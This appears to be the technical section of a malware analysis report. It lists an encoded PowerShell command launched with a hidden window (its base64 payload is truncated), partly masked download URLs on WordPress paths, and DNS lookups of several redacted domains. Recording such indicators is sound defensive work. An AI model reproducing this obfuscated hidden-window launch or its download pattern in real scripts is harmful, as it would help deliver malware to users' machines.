Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABkAGEAaQBrAHAAbwBtAGYAaQBhAGQAZgBpAHoAbQBlAGEAdABoAD0AJwBjAGgAZQBlAHoAeQB1AHUAZgB2AGEAbwB0AG0AYQBlAGMAJwA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAUwBFAG...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1996
- %TEMP%\935303.cvr
- 'fa####ialk.pp.ua':80
- 'fa###rialk.com':80
- 'fa###rialk.com':443
- 'ss#z.cc':443
- http://fa####ialk.pp.ua/wp-admin/gGQxSh/
- http://fa###rialk.com/wp-admin/gGQxSh/
- 'fa###rialk.com':443
- DNS ASK fa####ialk.pp.ua
- DNS ASK fa###rialk.com
- DNS ASK pe###ingdom.in
- DNS ASK te#####achieve.com.ng
- DNS ASK ke###port.co.il
- DNS ASK ss#z.cc
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABkAGEAaQBrAHAAbwBtAGYAaQBhAGQAZgBpAHoAbQBlAGEAdABoAD0AJwBjAGgAZQBlAHoAeQB1AHUAZgB2AGEAbwB0AG0AYQBlAGMAJwA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAUwBFAG...' (with hidden window)